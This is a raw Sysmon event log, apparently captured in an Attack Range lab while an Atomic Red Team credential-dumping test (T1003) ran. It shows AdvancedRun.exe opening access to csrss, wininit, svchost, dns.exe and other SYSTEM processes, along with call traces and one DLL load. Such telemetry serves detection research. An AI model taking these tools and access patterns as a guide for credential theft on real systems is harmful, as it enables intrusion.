\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943799Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943798Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943797Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943796Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943795Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943794Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943793Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943792Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003943790Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003943789Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943788Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943787Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 